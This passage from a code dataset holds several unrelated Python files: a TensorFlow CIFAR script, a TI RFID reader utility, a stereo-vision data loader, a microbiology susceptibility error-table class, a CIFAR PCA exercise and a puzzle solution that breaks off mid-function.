#输出为[-1,6,6,10]\r\nprint_op_shape(h_conv3)\r\n\r\nnt_hpool3 = avg_pool_6x6(h_conv3) #输出为[-1,1,1,10]\r\nprint_op_shape(nt_hpool3)\r\nnt_hpool3_flat = tf.reshape(nt_hpool3,[-1,10]) \r\n\r\ny_conv = tf.nn.softmax(nt_hpool3_flat)\r\n\r\n\r\n'''\r\n三 定义求解器\r\n'''\r\n\r\n#softmax交叉熵代价函数\r\ncost = tf.reduce_mean(-tf.reduce_sum(input_y * tf.log(y_conv),axis=1)) \r\n\r\n#求解器\r\ntrain = tf.train.AdamOptimizer(learning_rate).minimize(cost)\r\n\r\n#返回一个准确度的数据\r\ncorrect_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(input_y,1))\r\n#准确率\r\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,dtype=tf.float32))\r\n\r\n'''\r\n四 开始训练\r\n'''\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer())\r\n#创建summary_write,用于写文件\r\nsummary_writer = tf.summary.FileWriter('./log',sess.graph)\r\n \r\n# 启动计算图中所有的队列线程 调用tf.train.start_queue_runners来将文件名填充到队列,否则read操作会被阻塞到文件名队列中有值为止。\r\ntf.train.start_queue_runners(sess=sess)\r\n\r\nfor step in range(training_step):\r\n \r\n #获取batch_size大小数据集\r\n image_batch,label_batch = sess.run([images_train,labels_train])\r\n \r\n #one hot编码\r\n label_b = np.eye(10,dtype=np.float32)[label_batch]\r\n \r\n #开始训练\r\n train.run(feed_dict={input_x:image_batch,input_y:label_b},session=sess)\r\n \r\n if step % display_step == 0:\r\n train_accuracy = accuracy.eval(feed_dict={input_x:image_batch,input_y:label_b},session=sess)\r\n print('Step {0} tranining accuracy {1}'.format(step,train_accuracy))\r\n\r\n\r\n'''\r\n五 开始测试\r\n'''\r\nimage_batch, label_batch = sess.run([images_test, labels_test])\r\nlabel_b = np.eye(10,dtype=float)[label_batch]\r\nprint (\"finished! test accuracy %g\"%accuracy.eval(feed_dict={\r\n input_x:image_batch, input_y: label_b},session=sess))\r\n \r\n'''\r\n六 写summary日志\r\n'''\r\n#生成summary\r\ndecoding_summary = sess.run(decoding_summary_op,feed_dict={input_x:image_batch, input_y: label_b})\r\n#将summary写入文件\r\nsummary_writer.add_summary(decoding_summary)\r\n","sub_path":"8-17cifar反卷积_2.py","file_name":"8-17cifar反卷积_2.py","file_ext":"py","file_size_in_byte":10432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519291978","text":"#!/usr/bin/env python\n\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# Mark T. Smith 2016\n#\n\n\n#\n# The s6350_iso_transponder_details program returns data from a\n# single ISO15693 tag in the RFID reader field. It essentially\n# does an inventory with only 1 time slot, so only 1 tag can be\n# found. The following data from the tag can be returned.\n#\n# Transponder ID\n# The Data Storage Format Identifier (DSFID)\n#\n# See TI 6350 user manual and the ISO 15693-3 document for more information.\n#\n\nimport io\nimport sys\nimport serial\n\n#\n# Check that there is at least one argument which hopefully will be\n# the serial port ID that is to be used.\n#\n\nif len(sys.argv) < 2 :\n print (\"Usage: \" + sys.argv[0] + \" serial_port_to_use\")\n sys.exit()\n\n\n#\n# The TI reader defaults to 57600 baud, 8 bit data, 1 stop bit and no parity.\n# There is no handshaking.\n#\n# Note that the timeout here is set to 5 seconds. That is more than enough\n# time to allow the TI RFID reader to turn on its radio, command a tag, and get\n# data back from it. We assume that if we time out and we don't have any data\n# then the RFID reader is not on line.\n#\n\ntry:\n tiser = serial.Serial(sys.argv[1], baudrate=57600, bytesize=8,\n parity='N', stopbits=1, timeout=5, xonxoff=0, rtscts=0, dsrdtr=0)\nexcept:\n print (\"Usage: \" + sys.argv[0] + \" serial_port_to_use\")\n print (\"Can't open \" + sys.argv[1] + \".\")\n print (\"Under linux or Apple OS you need the full path, ie /dev/ttyUSB0.\")\n print (\"Under windows use the communication port name, ie COM8\")\n sys.exit()\n\n#\n# Form an ISO read transponder details command with a slot length of 1.\n# To use the write() method in python it needs to be in the form of a\n# string or a buffer, which is just a pointer into memory. This code\n# forms an array of bytes from a list that contains the command to send\n# and then uses a buffer (memoryview) to write it out.\n#\n# Note that the S6350 reader uses a wrapper that encapsulates all\n# ISO commands. Every ISO commands needs to have this wrapper with\n# the S6350 reader. For some commands the entire length is not\n# known ahead of time, so some pieces are filled in later and the\n# checksum bytes generated last and filled in. Although this command\n# can be completely known in advance, this code shows how to do it for\n# other ISO commands where things need to be filled in later, such as\n# specific UIDs or data to be written into a tag.\n#\n# In this wrapper, the bytes are as follows:\n#\n# 0: SOF\n# 1 & 2: length LSB and MSB respectively, filled in later\n# 3 & 4: TI reader address fields, alsways set to 0\n# 5: TI reader command flags\n# 6: TI reader ISO pass thru command, always 0x60\n#\n\nread_transponder_details = [0x01, 0, 0, 0, 0, 0, 0x60] # the ISO wrapper\n\n#\n# Extend the list with the actual ISO command without the SOF, CRC16 and EOF\n# The bytes that extend the list are as follows:\n#\n# 7: ISO reader config byte 0.The value in this case is 0x11\n# 8: Tag flags. In this case indicating 1 time slot (0x27)\n# 9: The ISO command. In this case 0x01\n# 10: The mask length for doing the inventory. In this case it is 0\n#\n\nread_transponder_details.extend([0x11, 0x27, 0x01, 0])\n\n#\n# Extend the list 1 more time with places for the checksum bytes.\n# Those will be computed and added later to the resulting byte array\n# that is formed to send to the reader.\n#\n\nread_transponder_details.extend([0, 0]) # the two checksum bytes\n\n#\n# Now that the list containing the command template is done, it is\n# possible to know the length of the command and create the byte array.\n#\n\ncommand_len = len(read_transponder_details)\ncommand = bytearray(command_len)\nidx = 0\n\nfor i in read_transponder_details:\n command[idx] = i\n idx += 1\n\n# Fill in the length\n\ncommand[1] = command_len\n\n# Compute and fill in the two checksum bytes\n\nchksum = 0\nidx = 0\nwhile idx < (command_len - 2):\n chksum ^= command[idx]\n idx += 1\n\ncommand[command_len - 2] = chksum # 1st byte is the checksum\ncommand[command_len - 1] = chksum ^ 0xff # 2nd byte is ones comp of the checksum\n\n# Send out the command to the reader\n\nx_str = raw_input (\"Enter any string to get ISO transponder details: \")\ntiser.write(memoryview(command)) # memoryview is the same as buffer\n\n#\n# We read the returned data from the reader in 2 passes. First we read\n# the first two bytes. The second byte is the length of the entire returned\n# packet. From that we determine how many more bytes to read which are then\n# read in the second pass.\n#\n\nline_size = tiser.read(2) # first pass, read first two bytes of reply\n\nif len(line_size) < 2:\n print (\"No data returned. Is the reader turned on?\")\n tiser.close()\n sys.exit()\n\n# second pass\n# print (\"Reply length is \" + str(ord(line_size[1])) + \" bytes.\")\nline_data = tiser.read((ord(line_size[1]) - 2)) # get the rest of the reply\n# print (\"I read \" + str(len(line_data)) + \" bytes.\")\n\n#\n# The returned data is in the form of string objects. Use that data to form\n# a single response list of integers. Integers are exactly what the RFID reader\n# is sending back. Doing this makes it easier to process the returned data.\n#\n\nresponse_len = ord(line_size[1]) # this is the length of the entire response\nresponse = []\nidx = 0\n\nresponse.append(ord(line_size[0])) # response SOF\nresponse.append(ord(line_size[1])) # response size\n# In the next line the -2 accounts for the SOF and size bytes done above.\nwhile idx < (response_len - 2): # do the rest of the response\n response.append(ord(line_data[idx]))\n idx += 1\n\n#\n# Compute the checksum. To compute the checksum of the returned data you just\n# take the XOR of all the data bytes that were returned and compare with the checksum\n# bytes that were returned.\n#\n# The 'while' statment ranges from 0 to the length of the returned data - 2. The\n# minus 2 is to adjust for the index (we number from 0) and also so that we do not\n# include the returned last checksum bytes in our own calculation. We compute the\n# checksum on the returned data bytes, but not including the returned checksum bytes.\n#\n\nchksum = 0\nidx = 0\nwhile idx < (response_len - 2):\n chksum ^= response[idx]\n idx += 1\n\n#\n# Compare the checksums and if they don't match then bail out.\n# If they do match then all is well and all that remains is to\n# dig out and print the tag data.\n#\n\nif chksum != (response[response_len - 2]): # and compare them\n print(\"Checksum error!\")\n# print (chksum)\n# print (response[response_len - 2])\n tiser.close()\n sys.exit()\n\n\n\nif response[7] == 0x01:\n print(\"Transponder ID: \" + \"0x%0.2X\" % response[20] + \"%0.2X\" % response[19]\n + \"%0.2X\" % response[18] + \"%0.2X\" % response[17]\n + \"%0.2X\" % response[16] + \"%0.2X\" % response[15]\n + \"%0.2X\" % response[14] + \"%0.2X\" % response[13])\n\n print(\"DSFID: \" + \"0x%0.2X\" % response[12])\n\nelse:\n print(\"RFID tag not read.\")\n\ntiser.close()\n","sub_path":"RFID_Project/IS2500_software/IS2500_software/python/iso/s6350_iso_transponder_details.py","file_name":"s6350_iso_transponder_details.py","file_ext":"py","file_size_in_byte":7503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350577505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 23 14:25:50 2014\n\n@author: nhpnp3\n\"\"\"\n\nimport time\nimport numpy as np\nimport os\nimport functions_polycrystal as rr\n\ndef fe_grab(ns, set_id, newdir, wrt_file):\n\n ## el is the # of elements per side of the cube \n el = 21 \n \n ### FINITE ELEMENT RESPONSES ###\n\n ## change to directory with the .vtk files \n# cwd = os.getcwd()\n## os.chdir(cwd + '\\\\' + newdir)\n# os.chdir(cwd + '/' + newdir) #for unix \n# \n# [r_real_all, msg] = rr.load_fe('orientation_%s%s.mat' %(ns, set_id),set_id,ns,el)\n# \n# ## return to the original directory\n# os.chdir('..') \n# \n r_real_all = np.random.random([el,el,el,ns,6])\n \n start = time.time() \n \n for comp in xrange(6): \n \n np.save('r%s_%s%s' %(comp,ns,set_id), r_real_all[:,:,:,comp,:]) \n# rr.WP(msg,wrt_file)\n \n ## responses in frequency space\n \n r_fft = np.fft.fftn(r_real_all[:,:,:,comp,:], axes = [0,1,2]) \n np.save('r%s_fft_%s%s' %(comp,ns,set_id),r_fft) \n \n end = time.time()\n timeE = np.round((end - start),3)\n \n msg = 'Convert FE results to frequency space: %s seconds' %timeE\n rr.WP(msg,wrt_file)\n \nif __name__ == '__main__':\n fe_grab(200, 'test', 'blarg', 'blargy.txt')","sub_path":"fip_collab/2014_09_16_stress_colony_mks/2014_09_25_LE_stress_mks/fe_grab_test.py","file_name":"fe_grab_test.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221587897","text":"import model_core\r\n\r\n#Class model_parameter_set is the object that stores all associated model parameters.\r\n#Each instance of disk_fitter has an object of class model_parameter_set stored\r\n#as its \"current model\", and any time fitting occurs, it updates the object\r\n#attributes, all of which are listed below.\r\n#The model_parameter_set object in turn contains an object of class mgm (described\r\n#in model_core.py) as one of ITS attributes, and this mgm object and its\r\n#routines will do the actual fitting.\r\n#The reason for this design is so that if we ever add other fitting algorithms, we can\r\n#trade out different \"model_engines\" to handle each type of fitting algorithm.\r\n#THe functions that update the error tables belong to class model_parameter_set.\r\nclass model_parameter_set():\r\n\r\n def __init__(self):\r\n self.current_dataset = {'mics':None, 'disks':None}\r\n self.model_type = 'mgm'\r\n #These cutoffs are either specified by the user (if they so indicate by checking the appropriate boxes)\r\n #OR determined by model fitting, which is done by the model_engine object below.\r\n self.ycutoffS = 4.0\r\n self.ycutoffR = 16.0\r\n self.xcutoffS = 32.0\r\n self.xcutoffR = 12.0\r\n self.model_engine = model_core.mgm()\r\n self.strain_name = 'Acinteobacter baumannii'\r\n #If this is checked, use the user's defined cutoffs.\r\n self.use_user_defined_disk_cutoffs = False\r\n #This one is extremely important -- if it's true, we don't need\r\n #to fit a model, because the ycutoffs and xcutoffs are defined to be the same\r\n #by microbiologists for MIC data, so the data handling will be very different.\r\n self.mic_vs_mic = False\r\n #The error counts in the final export table distinguish between what FDA considers 'very major' and 'major errors'.\r\n self.error_counts = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n\r\n #Microbiologists also distinguish between error types that occur in certain bands.\r\n #Hence the following dictionaries. The precise definition of these bands is a little complicated\r\n #and will be discussed further under the comments in the error update functions below.\r\n self.i_plus2_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n self.i_plus1_minus1_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n self.i_minus2_error = {'num_strains':0,'very major errors':0,\r\n 'major errors':0, 'minor errors':0}\r\n\r\n #Microbiologists define essential and categorical agreement for MIC vs MIC data only, so\r\n #IF we are dealing with MIC vs MIC data, we'll update these object attributes.\r\n self.essential_agreement = 0\r\n self.categorical_agreement = 0\r\n\r\n #color scheme for the plot.\r\n self.colormap_type = 'christmas_colors'\r\n\r\n #loads the user's specified csv file and does some basic error handling.\r\n #I didn't use Pandas because when freezing a python app to an exe, pandas\r\n #just adds a chunk to the memory footprint, and we don't really need to do\r\n #anything fancy that might require pandas here.\r\n def load_dataset(self, filename):\r\n error = False\r\n self.current_dataset = {'mics':[], 'disks':[]}\r\n with open(filename) as input_filehandle:\r\n for line in input_filehandle:\r\n try:\r\n current_values = line.strip().split(',')\r\n self.current_dataset['mics'].append(float(current_values[0]))\r\n self.current_dataset['disks'].append(float(current_values[1]))\r\n except:\r\n error = True\r\n if len(current_values) > 2:\r\n error = True\r\n if error == True or len(self.current_dataset['mics']) != len(self.current_dataset['disks']):\r\n #Make sure if there was an error loading the file to zero out self.current_dataset. That way,\r\n #other modules will be able to determine that no data has been loaded and do error handling\r\n #accordingly.\r\n self.current_dataset = {'mics':None, 'disks':None}\r\n return ('There was an error opening the selected file! Clearly you have made a mistake. '\r\n 'One reason why this may have occurred '\r\n 'is if you selected a non-csv file or a file with more than two columns. '\r\n 'Remember your instructions!')\r\n else:\r\n return '0'\r\n\r\n\r\n\r\n #This function updates the model_parameter_set error dictionaries by first zeroing them out,\r\n #then calling either update_error_for_disk_data or update_error_for_mic_vs_mic_data,\r\n #depending on which option the user checked.\r\n def update_error_tables(self, is_mic_vs_mic=False):\r\n try:\r\n self.ycutoffR = float(self.ycutoffR)\r\n self.ycutoffS = float(self.ycutoffS)\r\n self.xcutoffR = float(self.xcutoffR)\r\n self.xcutoffS = float(self.xcutoffS)\r\n except:\r\n return 'Non-numeric cutoff entered!'\r\n self.error_counts = {'num_strains':len(self.current_dataset['mics']),\r\n 'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_plus2_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_plus1_minus1_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n self.i_minus2_error = {'num_strains':0,'very major errors':0, 'major errors':0, 'minor errors':0}\r\n \r\n \r\n if is_mic_vs_mic == False:\r\n self.update_error_for_disk_data()\r\n else:\r\n self.update_error_for_mic_vs_mic_data()\r\n return '0'\r\n\r\n\r\n\r\n def update_error_for_disk_data(self):\r\n diskvalue = self.current_dataset['disks']\r\n micvalue = self.current_dataset['mics']\r\n for i in range(len(self.current_dataset['mics'])):\r\n #Assign predictions and actual values to categories\r\n if micvalue[i] <= self.ycutoffS:\r\n actual_category = 0\r\n elif micvalue[i] < self.ycutoffR:\r\n actual_category = 1\r\n else:\r\n actual_category = 2\r\n\r\n if diskvalue[i] >= self.xcutoffS:\r\n predicted_category = 0\r\n elif diskvalue[i] > self.xcutoffR:\r\n predicted_category = 1\r\n else:\r\n predicted_category = 2\r\n\r\n #This next part is a little subtle. Microbiologists when reviewing disk vs mic data like\r\n #to see how many of the errors (where predicted != actual) fall into \">=I+2\", \"I+1 to I-1\"\r\n #and \"<=I-2\". I+x in this case is defined as +x bins. So for example if the cutoff is 16\r\n #then I is MIC < 16, I+1 is MIC <= 16 and I+2 is MIC <=32. I had to double-check with our\r\n #microbio team the first time I implemented this because the way they were using these\r\n #\"I+2\", \"I+1 to I-1\" etc. categories was initially unclear to me. At any rate, the next set of\r\n #if-else statements implements their logic to determine errors in the corresponding categories.\r\n if micvalue[i] > (self.ycutoffR):\r\n self.i_plus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus2_error[error_code] += 1\r\n elif micvalue[i] <= self.ycutoffR and micvalue[i] >= self.ycutoffS:\r\n self.i_plus1_minus1_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus1_minus1_error[error_code] += 1\r\n else:\r\n self.i_minus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_minus2_error[error_code] += 1\r\n #We now update the overall whole-dataset error counts. An error is any situation where\r\n #predicted != actual. Microbiologists define \"very major\", \"major\" and \"minor\" errors\r\n #depending on how predicted compares to actual (implemented in check_is_error below).\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.error_counts[error_code] += 1\r\n\r\n\r\n\r\n\r\n def update_error_for_mic_vs_mic_data(self):\r\n self.essential_agreement = 0\r\n self.categorical_agreement = 0\r\n num_wrong_predictions = 0\r\n num_predictions_within_twofold = 0\r\n #If the user imported MIC vs MIC data, the procedure is the same but the direction of the inequality\r\n #for x values (what we're calling 'diskvalue' here for the sake of consistency) is reversed.\r\n xvalue = self.current_dataset['disks']\r\n micvalue = self.current_dataset['mics']\r\n for i in range(len(self.current_dataset['mics'])):\r\n if micvalue[i] <= self.ycutoffS:\r\n actual_category = 0\r\n elif micvalue[i] < self.ycutoffR:\r\n actual_category = 1\r\n else:\r\n actual_category = 2\r\n\r\n if xvalue[i] >= self.xcutoffR:\r\n predicted_category = 2\r\n elif xvalue[i] > self.xcutoffS:\r\n predicted_category = 1\r\n else:\r\n predicted_category = 0\r\n\r\n\r\n #Same applies as for the analogous section under update_error_for_disk_data above\r\n #(see the long comment under that function to explain what we're doing in this next\r\n #group of if-else statements).\r\n if micvalue[i] > (self.ycutoffR):\r\n self.i_plus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus2_error[error_code] += 1\r\n elif micvalue[i] <= self.ycutoffR and micvalue[i] >= self.ycutoffS:\r\n self.i_plus1_minus1_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_plus1_minus1_error[error_code] += 1\r\n else:\r\n self.i_minus2_error['num_strains'] += 1\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n self.i_minus2_error[error_code] += 1\r\n\r\n\r\n #We now update the overall whole-dataset error counts. An error is any situation where\r\n #predicted != actual. Microbiologists define \"very major\", \"major\" and \"minor\" errors\r\n #depending on how predicted compares to actual (implemented in check_is_error below).\r\n error_code = self.check_is_error(predicted_category, actual_category)\r\n if error_code != 'no error':\r\n num_wrong_predictions += 1\r\n self.error_counts[error_code] += 1\r\n #We also check whether the e-test MIC was at least within twofold of the broth MIC. If so,\r\n #microbiologists consider it to be within \"essential agreement\" even if predicted\r\n #category is wrong. So they track both # errors and \"essential agreement\". (Yes, I know,\r\n #twofold is a huge error bar in most fields. It's what microbiologists use -- MIC assays\r\n #are not very precise.)\r\n if xvalue[i] <= micvalue[i]*2.0:\r\n if xvalue[i] >= micvalue[i]*0.5:\r\n num_predictions_within_twofold += 1\r\n \r\n #For MIC vs MIC data only, update the essential and categorical agreement attributes.\r\n self.essential_agreement = 100.0 * num_predictions_within_twofold / self.error_counts['num_strains']\r\n self.categorical_agreement = 100.0 - 100.0*num_wrong_predictions / self.error_counts['num_strains']\r\n \r\n\r\n\r\n\r\n #Very major error means predicted susceptible but actually resistant.\r\n #Major error means predicted resistant but actually susceptible.\r\n #Minor error means one of {predicted, actual} is intermediate\r\n #and the other is something else. This distinction comes down to the impact\r\n #a missed prediction would have on patient treatment. If you predict susceptible\r\n #but bug is resistant, for example, this is the worst thing that can happen, because\r\n #patient is being treated with a drug that won't help, so the infection will continue\r\n #to grow. Predicting resistant when actually susceptible is bad but not quite as bad --\r\n #just means the doctor will pass on what could actually have been a useful drug for that patient.\r\n def check_is_error(self, predicted_category, actual_category):\r\n if predicted_category != actual_category:\r\n if actual_category == 1 or predicted_category == 1:\r\n return 'minor errors'\r\n elif actual_category == 2 and predicted_category == 0:\r\n return 'very major errors'\r\n elif actual_category == 0 and predicted_category == 2:\r\n return 'major errors'\r\n else:\r\n return 'no error'\r\n","sub_path":"scripts/model_object.py","file_name":"model_object.py","file_ext":"py","file_size_in_byte":12567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488507863","text":"import os\nimport torch\nimport torch.utils.data as data\nimport torch\nimport torchvision.transforms as transforms\nimport random\nfrom PIL import Image, ImageOps\nfrom dataloader.preprocess import get_transform\nimport dataloader.readpfm as rp\nimport numpy as np\nimport json\n\nfilepath=os.path.dirname(__file__)\n\nIMG_EXTENSIONS = [\n '.jpg', '.JPG', '.jpeg', '.JPEG',\n '.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',\n]\n\ndef is_image_file(filename):\n return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)\n\ndef default_loader(path):\n return Image.open(path).convert('RGB')\n\ndef disparity_loader(path):\n return rp.readPFM(path)\n\n\nclass myImageFloder(data.Dataset):\n def __init__(self, data_dir, training, easy_level=1.0, loader=default_loader, dploader= disparity_loader):\n\n self.metas = filepath + '/disp/SceneFlow/SceneFlow_meta.json'\n with open(self.metas, 'r') as f:\n self.metas = json.load(f)\n if training:\n left=self.metas['all_left_img']\n right=self.metas['all_right_img']\n left_disparity=self.metas['all_left_disp']\n else:\n left=self.metas['test_left_img']\n right=self.metas['test_right_img']\n left_disparity=self.metas['test_left_disp']\n\n self.data_dir=data_dir\n self.easy_level=easy_level\n self.left = left\n self.right = right\n self.disp_L = left_disparity\n self.loader = loader\n self.dploader = dploader\n self.training = training\n\n def __getitem__(self, index):\n left = self.data_dir+self.left[index]\n right = self.data_dir+self.right[index]\n disp_L= self.data_dir+self.disp_L[index]\n\n\n left_img = self.loader(left)\n right_img = self.loader(right)\n dataL, scaleL = self.dploader(disp_L)\n\n # dataL = np.ascontiguousarray(dataL,dtype=np.float32)\n dataL = Image.fromarray(dataL)\n\n\n\n if self.training:\n w, h = left_img.size\n size=(h,w)\n th, tw = 256, 512\n\n if self.easy_level>0.7:\n x1 = random.randint(0, w - tw)\n y1 = random.randint(0, h - th)\n\n left_img = left_img.crop((x1, y1, x1 + tw, y1 + th))\n right_img = right_img.crop((x1, y1, x1 + tw, y1 + th))\n dataL = dataL.crop((x1, y1, x1 + tw, y1 + th))\n\n processed = get_transform(input_size=left_img.size, target_size=(th, tw),\n easy_level=self.easy_level, augment=True)\n left_img = processed[0](left_img)\n left_img = processed[1](left_img)\n\n right_img = processed[0](right_img)\n right_img = processed[1](right_img)\n\n dataL = processed[0](dataL)\n dataL = np.ascontiguousarray(dataL, dtype=np.float32)\n dataL = torch.FloatTensor(dataL).unsqueeze(0)\n\n return dict(input=(left_img, right_img),target=dataL, size=size)\n else:\n w, h = left_img.size\n size = (h, w)\n left_img = left_img.crop((w-960, h-544, w, h))\n right_img = right_img.crop((w-960, h-544, w, h))\n dataL = np.ascontiguousarray(dataL, dtype=np.float32)\n\n processed = get_transform(augment=False)\n left_img = processed(left_img)\n right_img = processed(right_img)\n dataL = torch.FloatTensor(dataL).unsqueeze(0)\n\n return dict(input=(left_img, right_img), target=dataL, size=size, path=left.split('/')[-1])\n\n def __len__(self):\n # if self.training:\n # return len(self.left[:10000])\n # else:\n # return len(self.left)\n return len(self.left)\n","sub_path":"dataloader/SecenFlowLoader.py","file_name":"SecenFlowLoader.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514859930","text":"#!/user/bin/python3\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.image import imread\n\n\ndef enter():\n\t# x = np.array([1.0, 2.0, 3.0])\n\n\tx = np.arange(0, 6, 0.1) # 以0.1为单位,生成0到6的数据\n\ty1 = np.sin(x)\n\ty2 = np.cos(x)\n\t# 绘制图形\n\tplt.plot(x, y1, label=\"sin\")\n\tplt.plot(x, y2, linestyle=\"--\", label=\"cos\") # 用虚线绘制\n\tplt.xlabel(\"x\") # x轴标签\n\tplt.ylabel(\"y\") # y轴标签\n\tplt.title('sin & cos') # 标题\n\tplt.legend()\n\tplt.show()\n\n\nif __name__ == '__main__':\n\tenter()\n","sub_path":"newPythhon3/arrayTest.py","file_name":"arrayTest.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52336295","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[215]:\n\n\nimport numpy as np\nimport pickle\nfrom matplotlib import pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef unpickle(file):\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ndata1 = unpickle('cifar-10-batches-py/data_batch_1')\ndata2 = unpickle('cifar-10-batches-py/data_batch_2')\ndata3 = unpickle('cifar-10-batches-py/data_batch_3')\ndata4 = unpickle('cifar-10-batches-py/data_batch_4')\ndata5 = unpickle('cifar-10-batches-py/data_batch_5')\ndata = np.vstack((data1[b'data'],data2[b'data'],data3[b'data'],data4[b'data'],data5[b'data']))\nlabels = np.vstack((data1[b'labels'],data2[b'labels'],data3[b'labels'],data4[b'labels'],data5[b'labels']))\nlabels = labels.flatten()\n\n\n# conversion to greyscale\ndata = data/255;\ndata = 0.299 * data[:,:1024] + 0.587 * data[:,1024:2048] + 0.114 * data[:,2048:3072]\nprint(data.shape)\n\n\n# In[216]:\n\n\nindices = np.argsort(labels)\ndata = data[indices]\nlabels = labels[indices]\n\nmeans=[]\nfor i in range(0,50000,5000):\n means.append(np.mean(data[i:i+5000],axis=0))\nprint(np.matrix(means).shape)\nprint(means)\n\n\n# In[217]:\n\n\nclass_vectors = []\nfor i in range(0,50000,5000):\n values,vectors = np.linalg.eig(np.cov(data[i:i+5000].T))\n\n indices = np.argsort(values)\n indices = np.flip(indices)\n vectors = vectors[indices]\n values = values[indices]\n class_vectors.append(vectors[:,:20])\nprint(np.shape(class_vectors))\nprint(class_vectors)\n\n\n# In[218]:\n\n\nred_data = (np.matmul(data[0:5000],class_vectors[0]))\nprint(np.shape(red_data))\nfor i in range(1,10):\n red_data = np.vstack((red_data,np.dot(data[i*5000:(i+1)*5000],class_vectors[i])))\nprint(np.shape(red_data))\nplt.show()\n\n# In[219]:\n\n\nrec_data = (np.dot(red_data[0:5000],class_vectors[0].T))\nprint(np.shape(rec_data))\nfor i in range(1,10):\n rec_data = np.vstack((rec_data,np.dot(red_data[i*5000:(i+1)*5000],class_vectors[i].T)))\nprint(np.shape(rec_data))\n\n\ner_data = np.sqrt(np.sum(np.square(rec_data-data),axis=1))\nprint(er_data.shape)\nerrors = []\nfor i in range(10):\n errors.append(np.sum(er_data[i*5000:(i+1)*5000])/5000)\nplt.bar([i for i in range(len(errors))],errors)\nprint(errors)\n\n\n# In[220]:\n\n\nred_means=[np.mean(red_data[0:5000],axis=0)]\nfor i in range(5000,50000,5000):\n red_means.append(np.mean(red_data[i:i+5000],axis=0))\nprint(np.matrix(red_means).shape)\n\nsplit_red_data = np.split(red_data,10)\nprint(np.matrix(split_red_data[0]).shape)\n\nfor i in range(10):\n print(np.sum(np.square(split_red_data[i]-red_means[i])))\n\n\n# In[225]:\n\n\nfor i in range(10):\n for j in range(10):\n print(np.sqrt(np.sum(np.square(means[i]-means[j]))),end=\"\\t\")\n \n \n\n\n# In[222]:\n\n\nerrors = np.empty([10,10])\nfor i in range(10):\n for j in range(10):\n Eab = np.sum(np.square((means[i]+rec_data[j*5000:(j+1)*5000])-data[i*5000:(i+1)*5000]),axis=1)/1024 \n Eba = np.sum(np.square((means[j]+rec_data[i*5000:(i+1)*5000])-data[j*5000:(j+1)*5000]),axis=1)/1024\n errors[i][j]=(np.sum(Eab)+np.sum(Eba)/2)\nprint(errors)\n\n\n# In[223]:\n\n\nfor i in range(10):\n indices = np.argsort(errors[i])\n print(indices[0:4])\n\nplt.show()\n\n\n","sub_path":"HW_10/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522396749","text":"def readfile():\r\n lines=[]\r\n with open('input.txt') as f:\r\n for line in f:\r\n lines.append(line.strip().split('|'))\r\n return lines\r\noutput=[]\r\ndef part1():\r\n targets_found=0\r\n target_length = [2,3,4,7]\r\n lines=readfile()\r\n output_values= [line[-1].split(' ') for line in lines]\r\n for line in output_values:\r\n for number in line:\r\n if len(number) in target_length:\r\n targets_found+=1\r\n\r\n print(targets_found)\r\n\r\ndef get_top(one,seven):\r\n for char in seven:\r\n if char not in one:\r\n return char\r\n\r\ndef get_bottom_sides(input_lines):\r\n occurrences = {}\r\n for element in input_lines:\r\n for char in ['a','b','c','d','e','f','g']:\r\n if char in occurrences:\r\n occurrences[char] += element.count(char)\r\n else:\r\n occurrences[char] = element.count(char)\r\n for element in occurrences:\r\n if occurrences[element] == 9:\r\n bottom_right = element\r\n if occurrences[element] == 4:\r\n bottom_left = element\r\n return 